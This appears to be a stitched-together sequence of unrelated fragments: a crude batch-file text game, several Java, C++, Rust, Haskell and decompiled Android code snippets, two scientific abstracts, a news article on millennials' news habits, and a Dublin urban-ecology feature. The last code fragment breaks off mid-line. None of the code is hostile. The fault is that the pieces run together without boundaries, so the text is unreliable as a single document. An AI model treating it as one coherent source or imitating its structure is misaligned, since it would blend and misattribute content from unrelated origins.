COMMAND INCORRECT pause cls echo RETURNING TO MENU pause goto :menu :password cls set /p pass=Enter the password: if %pass%==upupdowndownleftrightleftrightbastart goto :konamicode if %pass%==upupdowndownleftrightleftrightBAstart goto :konamicode if %pass%==uuddlrlrbastart goto :konamicode if %pass%==uuddlrlrBAstart goto :konamicode if %pass%==F5redA6red goto :tobeadded if %pass%==lelbot goto :freakedn1PASS if not %pass%==none goto :wrongpass :wrongpass cls echo That's an incorrect password. echo Returning to the main menu. pause goto :menu :tobeadded cls echo GENERIC DATING SIM 2000 IS STILL IN DEVELOPMENT, SO SOME SECTIONS OF THE GAME ARE GOING TO BE AVALIBLE IN FUTURE VERSIONS. pause cls echo RETURNING TO THE MAIN MENU pause goto :menu :konamicode cls pause echo ... pause cls echo What did you expect? A fucking fanfare? echo Too bad, this can't transmit sound. pause cls echo Anyway, this will alter some stuff ingame, so enter: echo "F5redA6red" at the password screen pause cls echo RETURNING TO THE MENU pause goto :menu :tutorialorgame cls echo Would you like to see the tutorial? set /p tutyn=Y/N? if %tutyn%==Y goto :tutorial if %tutyn%==N goto :day0 if %tutyn%==y goto :tutorial if %tutyn%==n goto :day0 :tutorial cls echo In GDS2000, you will be asked to enter a letter or word in order to progress. echo When this section comes up, you must enter exactly what it asks you to enter for your desired option. pause cls echo If you enter an answer that wasn't made to progress the story, you will be sent to a screen like this: pause cls goto :errortutorial :errortutorial cls echo COMMAND INCORRECT pause cls echo RETURNING TO [section] pause goto :tutorial2 :tutorial2 cls echo Or some variation of that. pause cls echo There will be passwords throughout the game that are used to save progress such as: echo Number of days/nights echo Relationships echo Amount of endings unlocked echo etc. pause cls echo Please enjoy the game. pause goto :day0 :day0 cls set /p name=What is your name? cls color 71 echo --------???-------- echo %name%! pause cls set /a peoplemet+=1 echo --------lelbot420-------- echo Welcome to Weird Shit High! echo I'll be your friend who you some how know. pause cls set /a friends+=1 echo --------lelbot420-------- echo In WSH, you'll encounter humans, birds, and gigantic monsters. echo I myself have had me boat rocked by Cthulhu if you know what I mean. pause cls color 72 set /a peoplemet+=1 echo --------Cthulhu-------- echo WHERE THE HELL HAVE YOU BEEN? pause cls color 71 echo --------lelbot420-------- echo WHY DOES IT MATTER TO YOU? IT'S NOT LIKE I'LL CHEAT ON YOU, NO MATTER HOW SMALL YOUR... pause cls color 70 echo As your human friend and his gargantuan lover begin to argue, you can't help but let your mind drift off. echo Where will you live? echo Who will you live with? echo Oh yeah, you got your own room. pause cls echo Some time passes... pause cls color 78 echo Some time... pause cls color 07 echo passes. pause goto :n1 :n1 cls set /a days+=1 echo ---TIME 10:00PM--- echo Type 'stats' to see your current statistics echo Type 'games' to select a video game to play echo Type 'food ' to make food echo Type 'club' to go to some club echo Type 'library' to go to the library set /p night1=What will you do on your first night here? if %night1%==stats goto :gamestatsn1 if %night1%==games goto :gamesnight1 if %night1%==food goto :foodnight1 if %night1%==club goto :clubnight1 if %night1%==library goto :librarynight1 if not %night1%==none goto :n1error :gamestatsn1 cls echo Endings unlocked: %endingsunlocked% echo Number of people met: %peoplemet% echo Days complete: %days% echo Friends: %friends% pause goto :n1 :n1error cls echo You either entered a non existing command on night 1, echo or entered an existing command wrong. pause cls echo Returning to night 1... pause goto :n1 :gamesnight1 cls echo You look at your selection... pause cls echo Type 'Lonk' to play Legend of Lonk: Ahcarono of Tim echo Type 'Sanic' to play Sanic the Heghoog 2016 echo Type 'TF2' to play Team Fortress 2 set /p gaming1=What will you play? if %gaming1%==Lonk goto :lonk1 if %gaming1%==Sanic goto :sanic1 if %gaming1%==TF2 goto :tf21 if not %gaming1%==nogame goto :n1error :tf21 cls echo There's no internet where you are for some reason. echo When you get up to check your router, you hear a knock on your door. pause goto :end1 :end1 cls echo You go to your dorm's door, but are feeling worried about what's on the other end. echo Will you echo Run? (Type "Run") echo Open the door (Type "Open") set /p end1input=What will you do? if %end1input%==Run goto :end1run if %end1input%==Open goto :end1open if %end1input%==error goto :end1error :end1error cls echo Apparently you didn't input a correct command. pause cls echo Returning to last screen... pause goto :end1 :end1run cls echo You attempt to move, but are frozen with fear. echo The door suddenly slams open with your friend standing on the other side is confused to see you staring with wide eyes. pause cls color 01 echo --------lelbot420-------- echo Are you okay, %name%? pause cls color 07 echo "I'm just freaked out." (type a1) echo "Y...yes." (type a2) set /p end1r=What do you say? if %end1r%==a1 goto :freakedn1 if %end1r%==a2 goto :yesansn1 :freakedn1PASS cls set /p name=What's your name again? I forgot... cls echo Oh, that's right! It's %name%! pause goto :freakedn1 :freakedn1 cls color 01 echo --------lelbot420-------- echo Why? pause cls color 07 echo --------%name%-------- echo I'm not sure. pause cls echo You are envoloped in darkness, and you feel every inch of it seeping into your skin. pause cls color 80 echo It̥ ͑hurts͢ pause cls color 08 echo Please͇ ̂ṡțo᷿p̍ ̚it̃!̈ pause cls color 70 echo You got the ending: OUT OF NOWHERE FILLER ENDING set /a endingsunlocked+=1 echo Enter "OoNFE01restart" on the password screen to restart with this ending already unlocked! pause goto :finalresults :sanic1 cls echo You go fast like Sanic. pause cls echo You realize it's getting pretty late, so you turn off your interactive furry experiance echo and go to bed. pause cls color 80 pause cls color 70 pause goto :day1nogame :lonk1 cls echo You put "Legend of Lonk: AoT" into your Nintendo 69. pause cls echo You're up pretty late... pause cls color 80 pause cls color 70 pause goto :day1nogame :day1nogame cls :foodnight1 :clubnight1 :librarynight1 :finalresults cls echo FINAL RESULTS FOR %name% echo ------------------------------ echo Chatacters met: %peoplemet% echo Endings unlocked so far: %endingsunlocked% echo Days completed: %days% pause cls echo Thank you for playing! pause goto :menu
/** * Format a key's statistic cache hashmap to OfflineSlot storage convenient. * * @param o a HashMap which should have key: key, dimension, and bunch of variables * @return com.threathunter.nebula.slot.offline.OfflineSlotDataObj **/ public OfflineSlotDataObj format(final Map o) { byte[] key = slotUtils.get_stat_key((String) o.get("key"), (String) o.get("dimension")); if (key == null) { return null; } Gson gson = new Gson(); for (Object k : o.keySet()) { Object v = o.get(k); if (v instanceof Mutable) { o.put(k, ((Mutable) v).getValue()); } if (v instanceof Map) { for (Object vk : ((Map) v).keySet()) { Object vv = ((Map) v).get(vk); if (vv instanceof Mutable) { ((Map) v).put(vk, ((Mutable) vv).getValue()); } } } } byte[] value = gson.toJson(o).getBytes(); OfflineSlotDataObj dataObj = new OfflineSlotDataObj(key, value); return dataObj; }
/** * Periodic code for teleop mode should go here. * * Users should override this method for code which will be called each time a * new packet is received from the driver station and the robot is in teleop * mode. * * Packets are received approximately every 20ms. Fixed loop timing is not * guaranteed due to network timing variability and the function may not be * called at all if the Driver Station is disconnected. For most use cases the * variable timing will not be an issue. If your code does require guaranteed * fixed periodic timing, consider using Notifier or PIDController instead. */ void IterativeRobot::TeleopPeriodic() { static bool firstRun = true; if (firstRun) { std::printf("Default %s() method... Overload me!\n", __FUNCTION__); firstRun = false; } }
Millennials couldn't care less about the news. That's according to the research of University of Texas at Austin journalism professor Paula Poindexter. Young people do not make it a priority to stay informed because they feel that media talks down to them, comes off as propaganda or is just plain boring, Poindexter found. They also think most news media do not cover issues important to them. Some of her findings for her new book, “Millennials, News, and Social Media: Is News Engagement a Thing of the Past?", include: Most millennials give the news media average to failing grades when it comes to reporting on their generation. Millennials describe news as garbage, lies, one-sided, propaganda, repetitive and boring. When they consume news, millennials are more likely than their baby boomer parents to access news with smartphones and apps and share news through social media, texting and email. Most millennials do not depend on news to help with their daily lives. The majority of millennials do not feel being informed is important. Is this a problem? Poindexter worries in the future no one will be consuming the news, which is a citizen's duty to some. "We can’t continue to ignore the problem," Poindexter said. "The older generation is dying out. Who will be the role model encouraging future generations to be informed?" The Pew Research Center has shown young people overwhelmingly get their news from the Internet, and to an extent from television. Among the various age groups, 18-29 year-olds are the only group to show a significant difference in what type of media they prefer. Poindexter's book lays out more than two dozen best practices for news coverage on millennials, according to a release. Poindexter also created a course titled “Journalism, Society and the Citizen Journalist,” which she hopes will address young people's disengagement. “The news media, journalism schools and all stakeholders who care about having an informed society in the future must get involved if we are to avoid becoming a nation of news illiterates,” Poindexter said. The Daily Texan, the UT student newspaper, reported on the issue and cited one of their columnists, Douglas Luippold, who agreed that most media don't serve the needs of millennials. The Texan also spoke with UT journalism senior Jena Cuellar who pointed out an article from the New York Times, which begrudged millennials for moving in with their parents after graduating college. "The [media] is belittling us and talking down [to] us," Cuellar said. "They're not ignoring us, but they're not making us feel good either." There's no shortage of Times articles proving his point. Several articles were run this year about recent college graduates moving back home, citing a statistic which PolitiFact rated as false, but not before Karl Rove's Super PAC ran an ad blaming the "boomerang generation" on President Obama. Contrary to the claim repeated by CNN, Time and others (admittedly including The Huffington Post at one point), that 85 percent of recent grads moved back in with mom and dad, the actual rate is closer to 40 percent. Michael J. Rosenfeld, an associate professor of sociology at Stanford University, pointed out on the Times' website a rate of 40 to 45 percent isn't bad at all compared to historical census data.
//! The main html module which defines components, listeners, and class helpers. mod classes; mod component; mod conversion; mod listener; pub use classes::*; pub use component::*; pub use conversion::*; pub use listener::*; use crate::virtual_dom::VNode; use std::cell::RefCell; use std::rc::Rc; use wasm_bindgen::JsValue; use web_sys::Node; /// A type which expected as a result of `view` function implementation. pub type Html = VNode; /// Wrapped Node reference for later use in Component lifecycle methods. /// /// # Example /// Focus an `<input>` element on mount. /// ``` /// use web_sys::HtmlInputElement; ///# use yew::prelude::*; /// /// pub struct Input { /// node_ref: NodeRef, /// } /// /// impl Component for Input { /// type Message = (); /// type Properties = (); /// /// fn create(_: Self::Properties, _: ComponentLink<Self>) -> Self { /// Input { /// node_ref: NodeRef::default(), /// } /// } /// /// fn rendered(&mut self, first_render: bool) { /// if first_render { /// if let Some(input) = self.node_ref.cast::<HtmlInputElement>() { /// input.focus(); /// } /// } /// } /// /// fn change(&mut self, _: Self::Properties) -> ShouldRender { /// false /// } /// /// fn update(&mut self, _: Self::Message) -> ShouldRender { /// false /// } /// /// fn view(&self) -> Html { /// html! { /// <input ref={self.node_ref.clone()} type="text" /> /// } /// } /// } /// ``` /// ## Relevant examples /// - [Node Refs](https://github.com/yewstack/yew/tree/master/examples/node_refs) #[derive(Default, Clone)] pub struct NodeRef(Rc<RefCell<NodeRefInner>>); impl PartialEq for NodeRef { fn eq(&self, other: &Self) -> bool { self.0.as_ptr() == other.0.as_ptr() || Some(self) == other.0.borrow().link.as_ref() } } impl std::fmt::Debug for NodeRef { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!( f, "NodeRef {{ references: {:?} }}", self.get().map(|n| crate::utils::print_node(&n)) ) } } #[derive(PartialEq, Debug, Default, Clone)] struct NodeRefInner { node: Option<Node>, link: Option<NodeRef>, } impl NodeRef { /// Get the wrapped Node reference if it exists pub fn get(&self) -> Option<Node> { let inner = self.0.borrow(); inner.node.clone().or_else(|| inner.link.as_ref()?.get()) } /// Try converting the node reference into another form pub fn cast<INTO: AsRef<Node> + From<JsValue>>(&self) -> Option<INTO> { let node = self.get(); node.map(Into::into).map(INTO::from) } /// Wrap an existing `Node` in a `NodeRef` pub(crate) fn new(node: Node) -> Self { let node_ref = NodeRef::default(); node_ref.set(Some(node)); node_ref } /// Place a Node in a reference for later use pub(crate) fn set(&self, node: Option<Node>) { let mut this = self.0.borrow_mut(); this.node = node; this.link = None; } /// Link a downstream `NodeRef` pub(crate) fn link(&self, node_ref: Self) { // Avoid circular references if self == &node_ref { return; } let mut this = self.0.borrow_mut(); this.node = None; this.link = Some(node_ref); } /// Reuse an existing `NodeRef` pub(crate) fn reuse(&self, node_ref: Self) { // Avoid circular references if self == &node_ref { return; } let mut this = self.0.borrow_mut(); let existing = node_ref.0.borrow(); this.node = existing.node.clone(); this.link = existing.link.clone(); } } #[cfg(test)] mod tests { use super::*; use crate::utils::document; #[cfg(feature = "wasm_test")] use wasm_bindgen_test::{wasm_bindgen_test as test, wasm_bindgen_test_configure}; #[cfg(feature = "wasm_test")] wasm_bindgen_test_configure!(run_in_browser); #[test] fn self_linking_node_ref() { let node: Node = document().create_text_node("test node").into(); let node_ref = NodeRef::new(node.clone()); let node_ref_2 = NodeRef::new(node.clone()); // Link to self node_ref.link(node_ref.clone()); assert_eq!(node, node_ref.get().unwrap()); // Create cycle of two node refs node_ref.link(node_ref_2.clone()); node_ref_2.link(node_ref); assert_eq!(node, node_ref_2.get().unwrap()); } }
package com.marckregio.firebasemakunat.model; /** * Created by eCopy on 9/29/2017. */ public class SampleModel { public final static String USERID = "userid"; public final static String NAME = "name"; public final static String NUMBER = "number"; private String userid; private String name; private String number; public SampleModel(){ //Declare Default Constructor for Firebase Reference } public SampleModel(String userid, String name, String number){ this.userid = userid; this.name = name; this.number = number; } public String getUserid(){ return userid; } public String getName(){ return name; } public String getNumber(){ return number; } }
3‐D S Wave Imaging via Robust Neural Network Interpolation of 2‐D Profiles From Wave‐Equation Dispersion Inversion of Seismic Ambient Noise Ambient noise seismic data are widely used by geophysicists to explore subsurface properties at crustal and exploration scales. Two‐step dispersion inversion schema is the dominant method used to invert the surface wave data generated by the cross‐correlation of ambient noise signals. However, the two‐step methods have a 1‐D layered model assumption, which does not account for the complex wave propagation. To overcome this limitation, we employ a 2‐D wave‐equation dispersion (WD) inversion method which reconstructs the subsurface shear (S) velocity model in one step, and elastic wave‐equation modeling is used to simulate the subsurface wave propagation. In the WD method, the optimal S velocity model is obtained by minimizing the dispersion curve differences between the observed and predicted surface wave data, which makes WD method less prone to getting stuck to local minima. In our study, the observed Scholte waves are generated by cross‐correlating continuous ambient noise signals recorded by each ocean bottom node (OBN) in the 3‐D Gorgon OBN survey, Western Australia. For every two OBN lines, the WD method is used to retrieve the 2‐D S velocity structure beneath the first line. We then use a robust neural network (NN)‐based method to interpolate the inverted 2‐D velocity slices to a continuous 3‐D velocity model and also generate a corresponding uncertainty model. Moreover, we compared the predicted dispersion curves and waveforms to the observed data, and a robust waveform and dispersion match are observed across all of the Gorgon OBN lines.
def supports_protein(): pass
A dirt track leads through scrub grass, rubble, and weeds. To my right, a few dilapidated industrial buildings lie unoccupied. To my left, mounds of overgrown foliage overshadow the path; beyond them runs a line of track that used to shuttle trains to Sligo and Maynooth. This is wasteland by most people’s definition, although Kaethe Burt-O’Dea, a healthcare design consultant and “urban ecologist”, sees things differently. Burt-O’Dea last year received a Guinness Projects Award to help plan the conversion of this deserted train line from Broombridge in Cabra to Broadstone Station into a green sanctuary and cultural landmark. She points to a large pile of concrete rubble. “Those are the remains of the platform,” she says. “They’ve thrown it around, but that was the stop for the steam train. It ran this line until the 1960s.” This scrubland will mark the terminus for the new Luas Cross City extension traversing the city centre. That development, approved in 2012, has been seen as a long-overdue boost for the economy of the northside. Official announcements herald it as “an opportunity for substantial development and rejuvenation of an important inner-city urban quarter”. It is also the site for the Lifeline, Burt-O’Dea’s reclamation project, which aims to rejuvenate this “urban quarter” in rather different ways. It is still in the early planning stage, and to access the site we have had to sneak through a gap in the railings. This has long been a troubled spot, particularly the unmonitored Broombridge train station nearby, which is notorious for anti-social behaviour. Part of the remit of the Lifeline is to involve local communities, a task that might prove tricky, given local scepticism of terms such as “urban ecology”. Burt-O’Dea talks passionately about the projects she has in mind – allotments, roof-top apiaries – low-level, open-access projects that people can get involved in if they wish, and that she hopes will change the neighbourhood little by little. Uncherished overgrowth The Lifeline will be delivered in tandem with the installation of the Luas along the disused Midland Great Western Railway between Broadstone Station and Broombridge. Since 1961, the only glimpse most Dubliners have had of this line has been from one of the three road bridges overhead, from which you can look down on to a dense mass of uncherished overgrowth, scattered with old couches, electrical items and plastic bags. But walking the line opens up a different perspective. Too often these derelict sites are overlooked as wastelands, suitable only for development or “regeneration”. Burt-O’Dea thinks otherwise. For her, this is a rare site of natural biodiversity in the city that is worth cultivating. She says there could be 10 years’ work in it, but seems to relish the challenge, believing this kind of economy is what makes a city work. For her, the Lifeline is all about waste. The modern urban environment is inexorably wasteful. Beyond the day-to-day waste we generate ourselves, there is a sea of wasted resources and wasted human potential. Burt-O’Dea takes a robust, practical approach to urban waste. Like the railway builders before her, she is a pragmatist at heart who would like to see neglected resources put to use. The Lifeline will generate cottage industries, producing soap out of waste oil from chippers and restaurants. It will establish apiaries in the north-west inner city where people will be able to train as beekeepers and to bottle local honey, pollinated along the Lifeline and the nearby Botanic Gardens. In fact, bees’ working patterns – the commonage, the hive, the freedom from boundaries – will provide a model for the project as a whole, a way of thinking about the connections between productivity and urban communities. Burt-O’Dea has already begun to produce a range of soaps and foot soaks for sale, using waste materials from companies such as the Real Olive Co in Stoneybatter, to demonstrate the kinds of activities and products that can be expected from the Lifeline. Most importantly, she believes the project will be thoroughly sustainable. What becomes clear, as we talk, is that the Lifeline is about much more than this single strip of land. It is a symbolic struggle: a contest over how we view, and use, our city. She encounters a particular mentality when she talks to development agencies, she tells me. “If I want to build a bridge, say, there’s a process. We bring in agencies, we apply to Europe, we fly in [Spanish architect Santiago] Calatrava. It’s on that scale. It’s just so removed. And I’m thinking, couldn’t we stage a competition, get designs for temporary pontoon bridges made out of, I don’t know, plastic bottles?’ She’s exaggerating, but she has a point. The Grangegorman Urban Quarter website demonstrates the kind of sanitised, overdesigned environment envisioned for the area. Burt-O’Dea is not interested in these pristine, privatised spaces. For her, a genuine public space in the city requires hands-on involvement and a readiness to react. It’s not enough to just wade in with a series of prescriptions. You have to engage with the realities of the city and be prepared for them to shift. “Just look at this train line,” she says. “They built a whole strip of canal to service it, and it was only operational for 30 years. You have to be ready for change. That’s the mistake, planning for permanence. You’ve got to always be reacting.” Constant change For Burt-O’Dea, as for the railway builders, this is what cities are about: constant change. A city isn’t a problem to be solved, she says, it’s something that will always be evolving. This ethos, I suggest, might place her at odds with the interests of centralised urban planning. “That’s true. This is absolutely not the top-down agency approach. I don’t believe in that kind of prescriptive approach. But of course, without planning, there’s the danger it’ll end in chaos.” She pauses. “It’s striking the balance. That’s the challenge.” That challenge will underpin the whole project. We are effectively trespassing on the site. The Guinness grant is one thing, but a project of this magnitude will require more. Where will it come from? Are the Railway Procurement Agency, for instance, really going to give more than lip service to the Lifeline? It’s easy to be sceptical. This kind of close-focused enthusiasm will hardly be enough to challenge the heavily financed forces of urban development. Yet there is something contagious about Burt-O’Dea’s conviction. Her eye for detail informs a much broader vision, of a sort of Eden in northside Dublin. And standing on the overgrown line, under the Liam Whelan Bridge, it feels not only possible, but valuable, necessary and brave. A version of this article appeared in We Are Dublin, a new quarterly of long-form writing, wearedublin.ie
/** * encoding for String * * @author zeno (Sven Augustus) * @version 1.0 */ public class T01_StringEncodeDecode { static final Charset GBK = Charset.forName("GBK"); static final Charset GB2312 = Charset.forName("GB2312"); public static void main(String[] args) throws IOException { final String srcString = new String("s中文123456"); // UTF to GBK final byte[] gbkBytes = srcString.getBytes(GBK); writeFile(gbkBytes, GBK); byte[] gbkBytesFromFile = readFile(GBK); final String gbkString = new String(gbkBytesFromFile); System.out.println("gbkString from gbk file -> " + gbkString); // GBK to UTF8 final String utf8String = new String(gbkBytesFromFile, GBK); System.out.println("utf8String from gbk file-> " + utf8String); // GBK to GB2312 writeFile(gbkBytesFromFile, GB2312); byte[] gb2312BytesFromFile = readFile(GB2312); System.out.println("utf8String from gb2312 file-> " + new String(gb2312BytesFromFile, GB2312)); } protected static void writeFile(byte[] bytes, Charset charset) throws IOException { final String x = new String(bytes, charset); final File f = getFile(charset); try (PrintWriter pw = new PrintWriter( new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f), charset)))) { pw.write(x); pw.flush(); } } protected static byte[] readFile(Charset charset) throws IOException { final File f = getFile(charset); byte[] bytes = new byte[(int) f.length()]; try (FileInputStream fis = new FileInputStream(f)) { int i = fis.read(bytes); while (i > 0) { i = fis.read(bytes, i, bytes.length - i); } } return bytes; } private static File getFile(Charset charset) { return Paths.get("/var/tmp/" + charset.name() + ".txt").toFile(); } }
<reponame>nernstp/1had module Y2017.M08.D31.Solution where import Control.Arrow ((&&&)) import qualified Data.ByteString.Lazy.Char8 as BL import Data.List (sortOn) import Data.Map (Map) import qualified Data.Map as Map import Data.Ord import Data.Ratio ((%)) import Network.HTTP.Conduit -- below imports available via 1HaskellADay git repository import Data.Percentage -- Today's exercise comes by way of the tweep, @ahnqir. url :: FilePath url = "https://raw.githubusercontent.com/geophf/1HaskellADay/master/exercises/HAD/Y2017/M08/D31/fb-users.txt" {-- The above URL contains the top 10 facebook user-counts by country. Read in the above file, parse it, then output the percentage of facebook users per country (with the narrowed focus that the top 10 countries comprise 'all' (most, actually) of the facebook users, so we're 'smapling' the entire (100%) set. --} type Country = String type Count = Integer type FBusers = Map Country parseMillions :: String -> Integer parseMillions = (* 1000000) . read . init readFBusers :: FilePath -> IO (FBusers Count) readFBusers = fmap (Map.fromList . map ((head &&& parseMillions . last) . words) . drop 3 . lines . BL.unpack) . simpleHttp {-- >>> readFBusers url fromList [("Brazil",139000000),("India",241000000),("Indonesia",126000000), ("Mexico",85000000),("Philippines",69000000),("Thailand",57000000), ("Turkey",56000000),("UK",44000000),("USA",240000000), ("Vietnam",64000000)] --} percentageFBusersByCountry :: FBusers Count -> FBusers Percentage percentageFBusersByCountry counts = let total = sum (Map.elems counts) in Map.map (P . (% total)) counts {-- >>> percentageFBusersByCountry <$> readFBusers url fromList [("Brazil",12.39%),("India",21.49%),("Indonesia",11.23%), ("Mexico",7.58%),("Philippines",6.15%),("Thailand",5.08%), ("Turkey",4.99%),("UK",3.92%),("USA",21.40%),("Vietnam",5.70%)] --} {-- BONUS ----------------------------------------------------------------- Using whatever charting software you like, chart the facebook users (count) by country. --} -- one way to do this is to output it as CSV and let your spreadsheet chart it chartFBusers :: Ord a => Show a => FilePath -> FBusers a -> IO () chartFBusers outputfile = writeFile outputfile . unlines . ("Country,FB Users":) . map tup2line . sortOn (Down . snd) . Map.toList where tup2line (country,count) = country ++ (',':show count) {-- >>> readFBusers url >>= chartFBusers "Y2017/M08/D31/chart.csv" --}
/** * This method updates the progress in the view. It is responsible for * updating the counters. */ private void refreshCounters() { int startedCount; int currentCount; int totalCount; int errorCount; boolean hasErrors; boolean stopped; if (benchRunSession == null) { startedCount = 0; currentCount = 0; totalCount = 0; errorCount = 0; hasErrors = false; stopped = false; } else { startedCount = benchRunSession.getStartedCount(); currentCount = benchRunSession.getCurrentCount(); totalCount = benchRunSession.getTotalCount(); errorCount = benchRunSession.getErrorCount(); hasErrors = errorCount > 0; stopped = benchRunSession.isStopped(); } int ticksDone; if (startedCount == currentCount) { ticksDone = startedCount; } else { ticksDone = currentCount; } benchCounterPanel.setTotalRuns(totalCount); benchCounterPanel.setBenchRuns(ticksDone); benchCounterPanel.setBenchErrors(errorCount); progressBar.reset(hasErrors, stopped, ticksDone, totalCount); }
Electron Acceleration at Rippled Low Mach Number Shocks in Merging Galaxy Clusters Shock waves are ubiquitous in cosmic plasmas wherein they accelerate particles. In particular, X-ray and radio observations of so-called radio relics indicate electron acceleration at large-scale merger shocks in galaxy clusters. These shocks are also candidate sites for ultra-high-energy cosmic ray production. Merger shocks have low Mach numbers and propagate in hot plasmas with plasma beta $\beta\gg 1$. Particle energization and especially electron injection mechanisms are poorly understood in such conditions. Recent studies show that shock drift acceleration (SDA) accompanied by particle-wave interactions can provide electron acceleration, albeit a multi-scale shock structure in the form of ion-scale shock rippling may significantly alter the injection mechanisms. Here we study the effects of the shock rippling with large-scale 2D PIC simulations of low Mach number cluster shocks. We find that the electron acceleration rate increases considerably after the appearance of wave-rippling modes. The main acceleration process is stochastic SDA, in which electrons are confined in the shock transition region by pitch-angle scattering off magnetic turbulence and gain energy from motional electric field. The presence of multi-scale turbulence in the shock is essential for particle energization. Wide-energy non-thermal electron distributions are formed both upstream and downstream of the shock. We show for the first time that the downstream electron spectrum has a power-law form with index $p = 2.4$, in agreement with observations.
<reponame>ogii-test/ddp-study-server package org.broadinstitute.ddp.db.dao; import java.util.List; import org.broadinstitute.ddp.model.dsm.OnDemandActivity; import org.broadinstitute.ddp.model.dsm.TriggeredInstance; import org.jdbi.v3.sqlobject.SqlObject; import org.jdbi.v3.sqlobject.config.RegisterConstructorMapper; import org.jdbi.v3.sqlobject.customizer.Bind; import org.jdbi.v3.sqlobject.statement.SqlQuery; import org.jdbi.v3.stringtemplate4.UseStringTemplateSqlLocator; public interface DsmOnDemandActivityDao extends SqlObject { @UseStringTemplateSqlLocator @SqlQuery("queryAllOrderedOnDemandActivitiesByStudyId") @RegisterConstructorMapper(OnDemandActivity.class) List<OnDemandActivity> findAllOrderedOndemandActivitiesByStudy(@Bind("studyId") long studyId); @UseStringTemplateSqlLocator @SqlQuery("queryAllTriggeredInstancesByStudyIdAndActivityId") @RegisterConstructorMapper(TriggeredInstance.class) List<TriggeredInstance> findAllTriggeredInstancesByStudyAndActivity(@Bind("studyId") long studyId, @Bind("activityId") long activityId); }
<gh_stars>0 /* * Copyright 2012 hbz NRW (http://www.hbz-nrw.de/) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package de.nrw.hbz.regal.sync.ingest; import java.io.File; import java.util.HashMap; import java.util.Vector; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.w3c.dom.Element; import org.w3c.dom.NodeList; import archive.fedora.XmlUtils; import de.nrw.hbz.regal.sync.extern.DigitalEntity; import de.nrw.hbz.regal.sync.extern.DigitalEntityBuilderInterface; import de.nrw.hbz.regal.sync.extern.Md5Checksum; import de.nrw.hbz.regal.sync.extern.StreamType; /** * @author <NAME> <EMAIL> * */ public class OpusDigitalEntityBuilder implements DigitalEntityBuilderInterface { final static Logger logger = LoggerFactory .getLogger(OpusDigitalEntityBuilder.class); HashMap<String, DigitalEntity> map = new HashMap<String, DigitalEntity>(); @Override public DigitalEntity build(String baseDir, String pid) { // pid = pid.replace(':', '-'); if (!map.containsKey(pid)) { DigitalEntity e = new DigitalEntity(baseDir); e.setPid(pid); // store reference to e map.put(pid, e); // update Reference e = buildDigitalEntity(baseDir, pid, e); return e; } return map.get(pid); } private DigitalEntity buildDigitalEntity(String baseDir, String pid, DigitalEntity dtlDe) { // dtlDe = new DigitalEntity(baseDir); File file = new File(baseDir + File.separator + pid + ".xml"); String md5Hash = getMd5(file); dtlDe.addStream(file, "application/xml", StreamType.xMetaDissPlus, null, md5Hash); try { Vector<String> files = new Vector<String>(); Element root = XmlUtils.getDocument(file); // dtlDe.setDc(nodeToString(root)); NodeList list = root.getElementsByTagName("dc:title"); if (list != null && list.getLength() > 0) { dtlDe.setLabel(list.item(0).getTextContent()); } list = root.getElementsByTagName("dc:type"); if (list != null && list.getLength() > 0) { for (int i = 0; i < list.getLength(); i++) { Element el = (Element) list.item(i); String type = el.getAttribute("xsi:type"); if (type.compareTo("oai:pub-type") == 0) { dtlDe.setType(el.getTextContent()); } } } NodeList fileProperties = root .getElementsByTagName("ddb:fileProperties"); for (int i = 0; i < fileProperties.getLength(); i++) { Element fileProperty = (Element) fileProperties.item(i); String filename = fileProperty.getAttribute("ddb:fileName"); files.add(filename); } int i = 0; for (String f : files) { if (f.endsWith("pdf")) { i++; File fi = new File(baseDir + File.separator + pid + "_" + i + ".pdf"); String md5h = getMd5(fi); dtlDe.addStream(fi, "application/pdf", StreamType.DATA, null, md5h); } } } catch (Exception e) { logger.debug(e.getMessage()); } return dtlDe; } private String getMd5(File stream) { Md5Checksum md5 = new Md5Checksum(); return md5.getMd5Checksum(stream); } }
package com.google.android.gms.common.internal; import android.os.Binder; import android.os.Bundle; import android.os.IBinder; import android.os.IInterface; import android.os.Parcel; import com.andi.alquran.C0861R; import com.google.ads.AdSize; import com.google.android.gms.C1114a.C1096c; import com.google.android.gms.common.internal.C1330w.C1331a; import com.google.android.gms.maps.GoogleMap; /* renamed from: com.google.android.gms.common.internal.x */ public interface C1359x extends IInterface { /* renamed from: com.google.android.gms.common.internal.x.a */ public static abstract class C1361a extends Binder implements C1359x { /* renamed from: com.google.android.gms.common.internal.x.a.a */ private static class C1360a implements C1359x { private IBinder f3141a; C1360a(IBinder iBinder) { this.f3141a = iBinder; } public void m4860a(C1330w c1330w, zzan com_google_android_gms_common_internal_zzan) { Parcel obtain = Parcel.obtain(); Parcel obtain2 = Parcel.obtain(); try { obtain.writeInterfaceToken("com.google.android.gms.common.internal.IGmsServiceBroker"); obtain.writeStrongBinder(c1330w != null ? c1330w.asBinder() : null); if (com_google_android_gms_common_internal_zzan != null) { obtain.writeInt(1); com_google_android_gms_common_internal_zzan.writeToParcel(obtain, 0); } else { obtain.writeInt(0); } this.f3141a.transact(47, obtain, obtain2, 0); obtain2.readException(); } finally { obtain2.recycle(); obtain.recycle(); } } public void m4861a(C1330w c1330w, zzj com_google_android_gms_common_internal_zzj) { Parcel obtain = Parcel.obtain(); Parcel obtain2 = Parcel.obtain(); try { obtain.writeInterfaceToken("com.google.android.gms.common.internal.IGmsServiceBroker"); obtain.writeStrongBinder(c1330w != null ? c1330w.asBinder() : null); if (com_google_android_gms_common_internal_zzj != null) { obtain.writeInt(1); com_google_android_gms_common_internal_zzj.writeToParcel(obtain, 0); } else { obtain.writeInt(0); } this.f3141a.transact(46, obtain, obtain2, 0); obtain2.readException(); } finally { obtain2.recycle(); obtain.recycle(); } } public IBinder asBinder() { return this.f3141a; } } public static C1359x m4862a(IBinder iBinder) { if (iBinder == null) { return null; } IInterface queryLocalInterface = iBinder.queryLocalInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); return (queryLocalInterface == null || !(queryLocalInterface instanceof C1359x)) ? new C1360a(iBinder) : (C1359x) queryLocalInterface; } public boolean onTransact(int 